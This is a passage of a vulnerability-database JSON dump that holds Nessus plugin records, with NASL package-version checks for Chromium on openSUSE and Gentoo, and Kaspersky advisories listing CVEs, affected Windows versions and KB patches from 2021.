reference:\"90.0.4430.85-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"90.0.4430.85-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-shell\", reference:\"90.0.4430.85-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:48:38", "description": "This update for chromium fixes the following issues :\n\n - Chromium was updated to 90.0.4430.93 (boo#1184764,boo#1185047,boo#1185398)\n\n - CVE-2021-21227: Insufficient data validation in V8. \n\n - CVE-2021-21232: Use after free in Dev Tools. \n\n - CVE-2021-21233: Heap buffer overflow in ANGLE.\n\n - CVE-2021-21228: Insufficient policy enforcement in extensions.\n\n - CVE-2021-21229: Incorrect security UI in downloads.\n\n - CVE-2021-21230: Type Confusion in V8. \n\n - CVE-2021-21231: Insufficient data validation in V8.\n\n - CVE-2021-21222: Heap buffer overflow in V8\n\n - CVE-2021-21223: Integer overflow in Mojo\n\n - CVE-2021-21224: Type Confusion in V8\n\n - CVE-2021-21225: Out of bounds memory access in V8\n\n - CVE-2021-21226: Use after free in navigation\n\n - CVE-2021-21201: Use after free in permissions\n\n - CVE-2021-21202: Use after free in extensions\n\n - CVE-2021-21203: Use after free in Blink\n\n - CVE-2021-21204: Use after free in Blink\n\n - CVE-2021-21205: Insufficient policy enforcement in navigation\n\n - CVE-2021-21221: Insufficient validation of untrusted input in Mojo\n\n - CVE-2021-21207: Use after free in IndexedDB\n\n - CVE-2021-21208: Insufficient data validation in QR scanner\n\n - CVE-2021-21209: Inappropriate implementation in storage\n\n - CVE-2021-21210: Inappropriate implementation in Network\n\n - CVE-2021-21211: Inappropriate implementation in Navigatio \n\n - CVE-2021-21212: Incorrect security UI in Network Config UI\n\n - CVE-2021-21213: Use after free in WebMIDI", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-05-18T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2021-629)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2022-05-10T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-629.NASL", "href": "https://www.tenable.com/plugins/nessus/149603", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-629.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149603);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2021-21201\",\n \"CVE-2021-21202\",\n \"CVE-2021-21203\",\n \"CVE-2021-21204\",\n \"CVE-2021-21205\",\n \"CVE-2021-21207\",\n \"CVE-2021-21208\",\n \"CVE-2021-21209\",\n \"CVE-2021-21210\",\n \"CVE-2021-21211\",\n \"CVE-2021-21212\",\n \"CVE-2021-21213\",\n \"CVE-2021-21221\",\n \"CVE-2021-21222\",\n \"CVE-2021-21223\",\n \"CVE-2021-21224\",\n \"CVE-2021-21225\",\n \"CVE-2021-21226\",\n \"CVE-2021-21227\",\n \"CVE-2021-21228\",\n \"CVE-2021-21229\",\n \"CVE-2021-21230\",\n \"CVE-2021-21231\",\n \"CVE-2021-21232\",\n \"CVE-2021-21233\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2021-629)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for chromium fixes the following issues :\n\n - Chromium was updated to 90.0.4430.93\n (boo#1184764,boo#1185047,boo#1185398)\n\n - CVE-2021-21227: Insufficient data validation in V8. \n\n - CVE-2021-21232: Use after free in Dev Tools. \n\n - CVE-2021-21233: Heap buffer overflow in ANGLE.\n\n - CVE-2021-21228: Insufficient policy enforcement in\n extensions.\n\n - CVE-2021-21229: Incorrect security UI in downloads.\n\n - CVE-2021-21230: Type Confusion in V8. \n\n - CVE-2021-21231: Insufficient data validation in V8.\n\n - CVE-2021-21222: Heap buffer overflow in V8\n\n - CVE-2021-21223: Integer overflow in Mojo\n\n - CVE-2021-21224: Type Confusion in V8\n\n - CVE-2021-21225: Out of bounds memory access in V8\n\n - CVE-2021-21226: Use after free in navigation\n\n - CVE-2021-21201: Use after free in permissions\n\n - CVE-2021-21202: Use after free in extensions\n\n - CVE-2021-21203: Use after free in Blink\n\n - CVE-2021-21204: Use after free in Blink\n\n - CVE-2021-21205: Insufficient policy enforcement in\n navigation\n\n - CVE-2021-21221: Insufficient validation of untrusted\n input in Mojo\n\n - CVE-2021-21207: Use after free in IndexedDB\n\n - CVE-2021-21208: Insufficient data validation in QR\n scanner\n\n - CVE-2021-21209: Inappropriate implementation in storage\n\n - CVE-2021-21210: Inappropriate implementation in Network\n\n - CVE-2021-21211: Inappropriate implementation in\n Navigatio \n\n - CVE-2021-21212: Incorrect security UI in Network Config\n UI\n\n - CVE-2021-21213: Use after free in WebMIDI\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=11845047\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1184764\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1185398\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21233\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21226\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-90.0.4430.93-lp152.2.89.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-debuginfo-90.0.4430.93-lp152.2.89.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-90.0.4430.93-lp152.2.89.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-debuginfo-90.0.4430.93-lp152.2.89.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:22", "description": "The remote host is affected by the vulnerability described in GLSA-202104-08 (Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the CVE identifiers referenced below for details.\n Impact :\n\n Please review the referenced CVE identifiers for details.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-05-03T00:00:00", "type": "nessus", "title": "GLSA-202104-08 : Chromium, Google Chrome: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21142", "CVE-2021-21143", "CVE-2021-21144", "CVE-2021-21145", "CVE-2021-21146", "CVE-2021-21147", "CVE-2021-21148", "CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-2119", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193", "CVE-2021-21194", "CVE-2021-21195", "CVE-2021-21196", "CVE-2021-21197", "CVE-2021-21198", "CVE-2021-21199", "CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21206", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21220", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2022-12-07T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "p-cpe:/a:gentoo:linux:google-chrome", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202104-08.NASL", "href": "https://www.tenable.com/plugins/nessus/149223", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202104-08.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149223);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2021-21142\", \"CVE-2021-21143\", \"CVE-2021-21144\", \"CVE-2021-21145\", \"CVE-2021-21146\", \"CVE-2021-21147\", \"CVE-2021-21148\", \"CVE-2021-21149\", \"CVE-2021-21150\", \"CVE-2021-21151\", \"CVE-2021-21152\", \"CVE-2021-21153\", \"CVE-2021-21154\", \"CVE-2021-21155\", \"CVE-2021-21156\", \"CVE-2021-21157\", \"CVE-2021-21159\", \"CVE-2021-21160\", \"CVE-2021-21161\", \"CVE-2021-21162\", \"CVE-2021-21163\", \"CVE-2021-21165\", \"CVE-2021-21166\", \"CVE-2021-21167\", \"CVE-2021-21168\", \"CVE-2021-21169\", \"CVE-2021-21170\", \"CVE-2021-21171\", \"CVE-2021-21172\", \"CVE-2021-21173\", \"CVE-2021-21174\", \"CVE-2021-21175\", \"CVE-2021-21176\", \"CVE-2021-21177\", \"CVE-2021-21178\", \"CVE-2021-21179\", \"CVE-2021-21180\", \"CVE-2021-21181\", \"CVE-2021-21182\", \"CVE-2021-21183\", \"CVE-2021-21184\", \"CVE-2021-21185\", \"CVE-2021-21186\", \"CVE-2021-21187\", \"CVE-2021-21188\", \"CVE-2021-21189\", \"CVE-2021-2119\", \"CVE-2021-21191\", \"CVE-2021-21192\", \"CVE-2021-21193\", \"CVE-2021-21194\", \"CVE-2021-21195\", \"CVE-2021-21196\", \"CVE-2021-21197\", \"CVE-2021-21198\", \"CVE-2021-21199\", \"CVE-2021-21201\", \"CVE-2021-21202\", \"CVE-2021-21203\", \"CVE-2021-21204\", \"CVE-2021-21205\", \"CVE-2021-21206\", \"CVE-2021-21207\", \"CVE-2021-21208\", \"CVE-2021-21209\", \"CVE-2021-21210\", \"CVE-2021-21211\", \"CVE-2021-21212\", \"CVE-2021-21213\", \"CVE-2021-21214\", \"CVE-2021-21215\", \"CVE-2021-21216\", \"CVE-2021-21217\", \"CVE-2021-21218\", \"CVE-2021-21219\", \"CVE-2021-21220\", \"CVE-2021-21221\", \"CVE-2021-21222\", \"CVE-2021-21223\", \"CVE-2021-21224\", \"CVE-2021-21225\", \"CVE-2021-21226\", \"CVE-2021-21227\", \"CVE-2021-21228\", \"CVE-2021-21229\", \"CVE-2021-21230\", \"CVE-2021-21231\", \"CVE-2021-21232\", \"CVE-2021-21233\");\n script_xref(name:\"GLSA\", value:\"202104-08\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0007\");\n\n script_name(english:\"GLSA-202104-08 : Chromium, Google Chrome: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202104-08\n(Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202104-08\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-90.0.4430.93'\n All Google Chrome users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/google-chrome-90.0.4430.93'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21233\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:google-chrome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 90.0.4430.93\"), vulnerable:make_list(\"lt 90.0.4430.93\"))) flag++;\nif (qpkg_check(package:\"www-client/google-chrome\", unaffected:make_list(\"ge 90.0.4430.93\"), vulnerable:make_list(\"lt 90.0.4430.93\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium / Google Chrome\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2023-03-21T08:24:11", "description": "### *Detect date*:\n06/08/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2012 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows RT 8.1 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31956](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31956>) \n[CVE-2021-31973](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31973>) \n[CVE-2021-33742](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33742>) \n[CVE-2021-31954](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31954>) \n[CVE-2021-31201](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31201>) \n[CVE-2021-31199](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31199>) \n[CVE-2021-1675](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-1675>) \n[CVE-2021-31953](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31953>) \n[CVE-2021-31968](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31968>) \n[CVE-2021-31958](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31958>) \n[CVE-2021-31971](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31971>) \n[CVE-2021-26414](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-26414>) \n[CVE-2021-31959](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31959>) \n[CVE-2021-31962](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31962>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5003695](<http://support.microsoft.com/kb/5003695>) \n[5003636](<http://support.microsoft.com/kb/5003636>) \n[5003661](<http://support.microsoft.com/kb/5003661>) \n[5003667](<http://support.microsoft.com/kb/5003667>) \n[5003694](<http://support.microsoft.com/kb/5003694>) \n[5014742](<http://support.microsoft.com/kb/5014742>) \n[5014748](<http://support.microsoft.com/kb/5014748>) \n[5023755](<http://support.microsoft.com/kb/5023755>) \n[5023754](<http://support.microsoft.com/kb/5023754>) \n[5023759](<http://support.microsoft.com/kb/5023759>) \n[5023769](<http://support.microsoft.com/kb/5023769>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "kaspersky", "title": "KLA12198 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2023-03-20T00:00:00", "id": "KLA12198", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12198/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-21T08:24:09", "description": "### *Detect date*:\n06/08/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 for 